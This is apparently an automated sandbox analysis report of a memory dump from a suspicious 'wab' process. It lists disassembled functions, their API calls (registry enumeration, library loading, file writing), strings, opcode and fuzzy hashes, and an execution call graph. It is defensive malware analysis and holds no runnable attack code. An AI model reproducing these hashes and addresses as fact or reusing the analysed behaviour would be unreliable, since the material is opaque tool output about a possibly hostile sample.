                                          • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                          • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                          • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                          Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                          • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: InvalidateMessageRectSend
                                          • String ID: d=E
                                          • API String ID: 909852535-3703654223
                                          • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                          • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                          • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                          • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                          Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                          Download Yara Rule
                                          APIs
                                          • wcschr.MSVCRT ref: 0040F79E
                                          • wcschr.MSVCRT ref: 0040F7AC
                                            • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                            • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: wcschr$memcpywcslen
                                          • String ID: "
                                          • API String ID: 1983396471-123907689
                                          • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                          • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                          • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                          • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                          Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                          • _memicmp.MSVCRT ref: 0040C00D
                                          • memcpy.MSVCRT ref: 0040C024
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FilePointer_memicmpmemcpy
                                          • String ID: URL
                                          • API String ID: 2108176848-3574463123
                                          • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                          • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                          • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                          • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                          Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _snwprintfmemcpy
                                          • String ID: %2.2X
                                          • API String ID: 2789212964-323797159
                                          • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                          • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                          • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                          • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                          Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _snwprintf
                                          • String ID: %%-%d.%ds
                                          • API String ID: 3988819677-2008345750
                                          • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                          • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                          • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                          • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                          Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040E770
                                          • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: MessageSendmemset
                                          • String ID: F^@
                                          • API String ID: 568519121-3652327722
                                          • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                          • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                          • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                          • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                          Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: PlacementWindowmemset
                                          • String ID: WinPos
                                          • API String ID: 4036792311-2823255486
                                          • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                          • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                          • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                          • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                          Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                          • wcsrchr.MSVCRT ref: 0040DCE9
                                          • wcscat.MSVCRT ref: 0040DCFF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FileModuleNamewcscatwcsrchr
                                          • String ID: _lng.ini
                                          • API String ID: 383090722-1948609170
                                          • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                          • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                          • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                          • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                          Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                          • String ID: SHGetSpecialFolderPathW$shell32.dll
                                          • API String ID: 2773794195-880857682
                                          • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                          • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                          • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                          • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                          Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$memset
                                          • String ID:
                                          • API String ID: 438689982-0
                                          • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                          • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                          • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                          • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                          Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??2@$memset
                                          • String ID:
                                          • API String ID: 1860491036-0
                                          • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                          • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                          • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                          • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                          Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                          Download Yara Rule
                                          APIs
                                          • memcmp.MSVCRT ref: 00408AF3
                                            • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                            • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                            • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                          • memcmp.MSVCRT ref: 00408B2B
                                          • memcmp.MSVCRT ref: 00408B5C
                                          • memcpy.MSVCRT ref: 00408B79
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcmp$memcpy
                                          • String ID:
                                          • API String ID: 231171946-0
                                          • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                          • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                          • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                          • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                          Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: wcslen$wcscat$wcscpy
                                          • String ID:
                                          • API String ID: 1961120804-0
                                          • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                          • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                          • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                          • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                          Execution Graph

                                          Execution Coverage:2.4%
                                          Dynamic/Decrypted Code Coverage:20.4%
                                          Signature Coverage:0.5%
                                          Total number of Nodes:847
                                          Total number of Limit Nodes:16
                                          execution_graph 34108 40fc40 70 API calls 34281 403640 21 API calls 34109 427fa4 42 API calls 34282 412e43 _endthreadex 34283 425115 76 API calls __fprintf_l 34284 43fe40 133 API calls 34112 425115 83 API calls __fprintf_l 34113 401445 memcpy memcpy DialogBoxParamA 34114 440c40 34 API calls 33239 444c4a 33258 444e38 33239->33258 33241 444c56 GetModuleHandleA 33242 444c68 __set_app_type __p__fmode __p__commode 33241->33242 33244 444cfa 33242->33244 33245 444d02 __setusermatherr 33244->33245 33246 444d0e 33244->33246 33245->33246 33259 444e22 _controlfp 33246->33259 33248 444d13 _initterm __getmainargs _initterm 33249 444d6a GetStartupInfoA 33248->33249 33251 444d9e GetModuleHandleA 33249->33251 33260 40cf44 33251->33260 33255 444dcf _cexit 33257 444e04 33255->33257 33256 444dc8 exit 33256->33255 33258->33241 33259->33248 33311 404a99 LoadLibraryA 33260->33311 33262 40cf60 33299 40cf64 33262->33299 33318 410d0e 33262->33318 33264 40cf6f 33322 40ccd7 ??2@YAPAXI 33264->33322 33266 40cf9b 33336 407cbc 33266->33336 33271 40cfc4 33354 409825 memset 33271->33354 33272 40cfd8 33359 4096f4 memset 33272->33359 33277 40d181 ??3@YAXPAX 33279 40d1b3 33277->33279 33280 40d19f DeleteObject 33277->33280 33278 407e30 _strcmpi 33281 40cfee 33278->33281 33383 407948 ??3@YAXPAX ??3@YAXPAX 33279->33383 33280->33279 33283 40cff2 RegDeleteKeyA 33281->33283 33284 40d007 EnumResourceTypesA 33281->33284 33283->33277 33286 40d047 33284->33286 33287 40d02f MessageBoxA 33284->33287 33285 40d1c4 33384 4080d4 ??3@YAXPAX 33285->33384 33289 40d0a0 CoInitialize 33286->33289 33364 40ce70 33286->33364 33287->33277 33381 40cc26 strncat memset RegisterClassA CreateWindowExA 33289->33381 33291 40d1cd 33385 407948 ??3@YAXPAX ??3@YAXPAX 33291->33385 33293 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33382 40c256 PostMessageA 33293->33382 33296 40d061 ??3@YAXPAX 33296->33279 33300 40d084 DeleteObject 33296->33300 33297 40d09e 33297->33289 33299->33255 33299->33256 33300->33279 33303 40d0f9 GetMessageA 33304 40d17b 33303->33304 33305 40d10d 33303->33305 33304->33277 33306 40d113 TranslateAccelerator 33305->33306 33308 40d145 IsDialogMessage 33305->33308 33309 40d139 IsDialogMessage 33305->33309 33306->33305 33307 40d16d GetMessageA 33306->33307 33307->33304 33307->33306 33308->33307 33310 40d157 TranslateMessage DispatchMessageA 33308->33310 33309->33307 33309->33308 33310->33307 33312 404ac4 GetProcAddress 33311->33312 33315 404ae8 33311->33315 33313 404ad4 33312->33313 33314 404add FreeLibrary 33312->33314 33313->33314 33314->33315 33316 404b13 33315->33316 33317 404afc MessageBoxA 33315->33317 33316->33262 33317->33262 33319 410d17 LoadLibraryA 33318->33319 33320 410d3c 33318->33320 33319->33320 33321 410d2b GetProcAddress 33319->33321 33320->33264 33321->33320 33323 40cd08 ??2@YAPAXI 33322->33323 33325 40cd26 33323->33325 33326 40cd2d 33323->33326 33393 404025 6 API calls 33325->33393 33328 40cd66 33326->33328 33329 40cd59 DeleteObject 33326->33329 33386 407088 33328->33386 33329->33328 33331 40cd6b 33389 4019b5 33331->33389 33334 4019b5 strncat 33335 40cdbf _mbscpy 33334->33335 33335->33266 33395 407948 ??3@YAXPAX ??3@YAXPAX 33336->33395 33338 407e04 33396 407a55 33338->33396 33341 407a1f malloc memcpy ??3@YAXPAX ??3@YAXPAX 33348 407cf7 33341->33348 33342 407ddc 33342->33338 33408 407a1f 33342->33408 33344 407d7a ??3@YAXPAX 33344->33348 33348->33338 33348->33341 33348->33342 33348->33344 33399 40796e 7 API calls 33348->33399 33400 406f30 33348->33400 33350 407e30 33351 407e57 33350->33351 33352 407e38 33350->33352 33351->33271 33351->33272 33352->33351 33353 407e41 _strcmpi 33352->33353 33353->33351 33353->33352 33414 4097ff 33354->33414 33356 409854 33419 409731 33356->33419 33360 4097ff 3 API calls 33359->33360 33361 409723 33360->33361 33439 40966c 33361->33439 33453 4023b2 33364->33453 33370 40ced3 33542 40cdda 7 API calls 33370->33542 33371 40cece 33374 40cf3f 33371->33374 33494 40c3d0 memset GetModuleFileNameA strrchr 33371->33494 33374->33296 33374->33297 33377 40ceed 33521 40affa 33377->33521 33381->33293 33382->33303 33383->33285 33384->33291 33385->33299 33394 406fc7 memset _mbscpy 33386->33394 33388 40709f CreateFontIndirectA 33388->33331 33390 4019e1 33389->33390 33391 4019c2 strncat 33390->33391 33392 4019e5 memset LoadIconA 33390->33392 33391->33390 33392->33334 33393->33326 33394->33388 33395->33348 33397 407a65 33396->33397 33398 407a5b ??3@YAXPAX 33396->33398 33397->33350 33398->33397 33399->33348 33401 406f37 malloc 33400->33401 33402 406f7d 33400->33402 33404 406f73 33401->33404 33405 406f58 33401->33405 33402->33348 33404->33348 33406 406f6c ??3@YAXPAX 33405->33406 33407 406f5c memcpy 33405->33407 33406->33404 33407->33406 33409 407a38 33408->33409 33410 407a2d ??3@YAXPAX 33408->33410 33412 406f30 3 API calls 33409->33412 33411 407a43 33410->33411 33413 40796e 7 API calls 33411->33413 33412->33411 33413->33338 33430 406f96 GetModuleFileNameA 33414->33430 33416 409805 strrchr 33417 409814 33416->33417 33418 409817 _mbscat 33416->33418 33417->33418 33418->33356 33431 44b090 33419->33431 33424 40930c 3 API calls 33425 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33424->33425 33426 4097c5 LoadStringA 33425->33426 33429 4097db 33426->33429 33428 4097f3 33428->33277 33429->33426 33429->33428 33438 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33429->33438 33430->33416 33432 40973e _mbscpy _mbscpy 33431->33432 33433 40930c 33432->33433 33434 44b090 33433->33434 33435 409319 memset GetPrivateProfileStringA 33434->33435 33436 409374 33435->33436 33437 409364 WritePrivateProfileStringA 33435->33437 33436->33424 33437->33436 33438->33429 33449 406f81 GetFileAttributesA 33439->33449 33441 409675 33442 4096ee 33441->33442 33443 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33441->33443 33442->33278 33450 409278 GetPrivateProfileStringA 33443->33450 33445 4096c9 33451 409278 GetPrivateProfileStringA 33445->33451 33447 4096da 33452 409278 GetPrivateProfileStringA 33447->33452 33449->33441 33450->33445 33451->33447 33452->33442 33544 409c1c 33453->33544 33456 401e69 memset 33583 410dbb 33456->33583 33459 401ec2 33613 4070e3 strlen _mbscat _mbscpy _mbscat 33459->33613 33460 401ed4 33598 406f81 GetFileAttributesA 33460->33598 33463 401ee6 strlen strlen 33465 401f15 33463->33465 33467 401f28 33463->33467 33614 4070e3 strlen _mbscat _mbscpy _mbscat 33465->33614 33599 406f81 GetFileAttributesA 33467->33599 33469 401f35 33600 401c31 33469->33600 33472 401f75 33612 410a9c RegOpenKeyExA 33472->33612 33474 401c31 7 API calls 33474->33472 33475 401f91 33476 402187 33475->33476 33477 401f9c memset 33475->33477 33479 402195 ExpandEnvironmentStringsA 33476->33479 33480 4021a8 _strcmpi 33476->33480 33615 410b62 RegEnumKeyExA 33477->33615 33624 406f81 GetFileAttributesA 33479->33624 33480->33370 33480->33371 33482 40217e RegCloseKey 33482->33476 33483 401fd9 atoi 33484 401fef memset memset sprintf 33483->33484 33492 401fc9 33483->33492 33616 410b1e 33484->33616 33487 402165 33487->33482 33488 406f81 GetFileAttributesA 33488->33492 33489 402076 memset memset strlen strlen 33489->33492 33490 4070e3 strlen _mbscat _mbscpy _mbscat 33490->33492 33491 4020dd strlen strlen 33491->33492 33492->33482 33492->33483 33492->33487 33492->33488 33492->33489 33492->33490 33492->33491 33493 402167 _mbscpy 33492->33493 33623 410b62 RegEnumKeyExA 33492->33623 33493->33482 33495 40c422 33494->33495 33496 40c425 _mbscat _mbscpy _mbscpy 33494->33496 33495->33496 33497 40c49d 33496->33497 33498 40c512 33497->33498 33499 40c502 GetWindowPlacement 33497->33499 33500 40c538 33498->33500 33645 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33498->33645 33499->33498 33638 409b31 33500->33638 33504 40ba28 33505 40ba87 33504->33505 33511 40ba3c 33504->33511 33648 406c62 LoadCursorA SetCursor 33505->33648 33507 40ba43 _mbsicmp 33507->33511 33508 40ba8c 33649 410a9c RegOpenKeyExA 33508->33649 33650 404785 33508->33650 33653 403c16 33508->33653 33729 4107f1 33508->33729 33732 404734 33508->33732 33509 40baa0 33510 407e30 _strcmpi 33509->33510 33514 40bab0 33510->33514 33511->33505 33511->33507 33740 40b5e5 10 API calls 33511->33740 33512 40bafa SetCursor 33512->33377 33514->33512 33515 40baf1 qsort 33514->33515 33515->33512 34101 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33521->34101 33523 40b00e 33524 40b016 33523->33524 33525 40b01f GetStdHandle 33523->33525 34102 406d1a CreateFileA 33524->34102 33527 40b01c 33525->33527 33528 40b035 33527->33528 33529 40b12d 33527->33529 34103 406c62 LoadCursorA SetCursor 33528->34103 34107 406d77 9 API calls 33529->34107 33532 40b136 33543 40c580 28 API calls 33532->33543 33533 40b042 33535 40b087 33533->33535 33540 40b0a1 33533->33540 34104 40a57c strlen WriteFile 33533->34104 33535->33540 34105 40a699 12 API calls 33535->34105 33537 40b0d6 33538 40b116 CloseHandle 33537->33538 33539 40b11f SetCursor 33537->33539 33538->33539 33539->33532 33540->33537 34106 406d77 9 API calls 33540->34106 33542->33371 33543->33374 33556 409a32 33544->33556 33547 409c80 memcpy memcpy 33548 409cda 33547->33548 33548->33547 33549 409d18 ??2@YAPAXI ??2@YAPAXI 33548->33549 33553 408db6 12 API calls 33548->33553 33550 409d54 ??2@YAPAXI 33549->33550 33552 409d8b 33549->33552 33550->33552 33566 409b9c 33552->33566 33553->33548 33555 4023c1 33555->33456 33557 409a44 33556->33557 33558 409a3d ??3@YAXPAX 33556->33558 33559 409a52 33557->33559 33560 409a4b ??3@YAXPAX 33557->33560 33558->33557 33561 409a63 33559->33561 33562 409a5c ??3@YAXPAX 33559->33562 33560->33559 33563 409a83 ??2@YAPAXI ??2@YAPAXI 33561->33563 33564 409a73 ??3@YAXPAX 33561->33564 33565 409a7c ??3@YAXPAX 33561->33565 33562->33561 33563->33547 33564->33565 33565->33563 33567 407a55 ??3@YAXPAX 33566->33567 33568 409ba5 33567->33568 33569 407a55 ??3@YAXPAX 33568->33569 33570 409bad 33569->33570 33571 407a55 ??3@YAXPAX 33570->33571 33572 409bb5 33571->33572 33573 407a55 ??3@YAXPAX 33572->33573 33574 409bbd 33573->33574 33575 407a1f 4 API calls 33574->33575 33576 409bd0 33575->33576 33577 407a1f 4 API calls 33576->33577 33578 409bda 33577->33578 33579 407a1f 4 API calls 33578->33579 33580 409be4 33579->33580 33581 407a1f 4 API calls 33580->33581 33582 409bee 33581->33582 33582->33555 33584 410d0e 2 API calls 33583->33584 33585 410dca 33584->33585 33586 410dfd memset 33585->33586 33625 4070ae 33585->33625 33587 410e1d 33586->33587 33628 410a9c RegOpenKeyExA 33587->33628 33590 401e9e strlen strlen 33590->33459 33590->33460 33592 410e4a 33593 410e7f _mbscpy 33592->33593 33629 410d3d _mbscpy 33592->33629 33593->33590 33595 410e5b 33630 410add RegQueryValueExA 33595->33630 33597 410e73 RegCloseKey 33597->33593 33598->33463 33599->33469 33631 410a9c RegOpenKeyExA 33600->33631 33602 401c4c 33603 401cad 33602->33603 33632 410add RegQueryValueExA 33602->33632 33603->33472 33603->33474 33605 401c6a 33606 401c71 strchr 33605->33606 33607 401ca4 RegCloseKey 33605->33607 33606->33607 33608 401c85 strchr 33606->33608 33607->33603 33608->33607 33609 401c94 33608->33609 33633 406f06 strlen 33609->33633 33611 401ca1 33611->33607 33612->33475 33613->33460 33614->33467 33615->33492 33636 410a9c RegOpenKeyExA 33616->33636 33618 410b34 33619 410b5d 33618->33619 33637 410add RegQueryValueExA 33618->33637 33619->33492 33621 410b4c RegCloseKey 33621->33619 33623->33492 33624->33480 33626 4070bd GetVersionExA 33625->33626 33627 4070ce 33625->33627 33626->33627 33627->33586 33627->33590 33628->33592 33629->33595 33630->33597 33631->33602 33632->33605 33634 406f17 33633->33634 33635 406f1a memcpy 33633->33635 33634->33635 33635->33611 33636->33618 33637->33621 33639 409b40 33638->33639 33641 409b4e 33638->33641 33646 409901 memset SendMessageA 33639->33646 33642 409b99 33641->33642 33643 409b8b 33641->33643 33642->33504 33647 409868 SendMessageA 33643->33647 33645->33500 33646->33641 33647->33642 33648->33508 33649->33509 33651 4047a3 33650->33651 33652 404799 FreeLibrary 33650->33652 33651->33509 33652->33651 33654 4107f1 FreeLibrary 33653->33654 33655 403c30 LoadLibraryA 33654->33655 33656 403c74 33655->33656 33657 403c44 GetProcAddress 33655->33657 33658 4107f1 FreeLibrary 33656->33658 33657->33656 33659 403c5e 33657->33659 33660 403c7b 33658->33660 33659->33656 33662 403c6b 33659->33662 33661 404734 3 API calls 33660->33661 33663 403c86 33661->33663 33662->33660 33741 4036e5 33663->33741 33666 4036e5 26 API calls 33667 403c9a 33666->33667 33668 4036e5 26 API calls 33667->33668 33669 403ca4 33668->33669 33670 4036e5 26 API calls 33669->33670 33671 403cae 33670->33671 33753 4085d2 33671->33753 33679 403ce5 33680 403cf7 33679->33680 33934 402bd1 39 API calls 33679->33934 33799 410a9c RegOpenKeyExA 33680->33799 33683 403d0a 33684 403d1c 33683->33684 33935 402bd1 39 API calls 33683->33935 33800 402c5d 33684->33800 33688 4070ae GetVersionExA 33689 403d31 33688->33689 33818 410a9c RegOpenKeyExA 33689->33818 33691 403d51 33692 403d61 33691->33692 33936 402b22 46 API calls 33691->33936 33819 410a9c RegOpenKeyExA 33692->33819 33695 403d87 33696 403d97 33695->33696 33937 402b22 46 API calls 33695->33937 33820 410a9c RegOpenKeyExA 33696->33820 33699 403dbd 33700 403dcd 33699->33700 33938 402b22 46 API calls 33699->33938 33821 410808 33700->33821 33704 404785 FreeLibrary 33705 403de8 33704->33705 33825 402fdb 33705->33825 33708 402fdb 34 API calls 33709 403e00 33708->33709 33841 4032b7 33709->33841 33718 403e3b 33720 403e73 33718->33720 33721 403e46 _mbscpy 33718->33721 33888 40fb00 33720->33888 33940 40f334 334 API 